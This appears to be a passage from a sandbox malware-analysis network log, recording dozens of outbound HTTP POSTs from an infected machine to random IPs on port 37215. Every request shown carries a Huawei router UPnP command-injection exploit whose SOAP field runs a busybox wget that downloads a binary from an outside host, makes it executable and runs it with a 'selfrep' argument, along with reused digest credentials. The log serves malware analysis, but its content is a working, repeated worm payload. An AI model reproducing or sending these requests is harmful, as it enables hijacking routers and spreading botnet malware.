20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2371192.168.2.1333176157.173.243.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624480963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2372192.168.2.1349164157.177.190.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624501944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2373192.168.2.1348652197.63.63.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624511003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2374192.168.2.1334766157.226.211.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624747992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2375192.168.2.133369641.140.59.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624757051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2376192.168.2.1345632197.176.200.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624758959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2377192.168.2.135221041.219.180.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624777079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2378192.168.2.1356494117.110.63.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624777079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2379192.168.2.1345562157.238.188.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624799013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2380192.168.2.1344932157.185.102.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624798059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2381192.168.2.1359354197.66.58.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624799967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
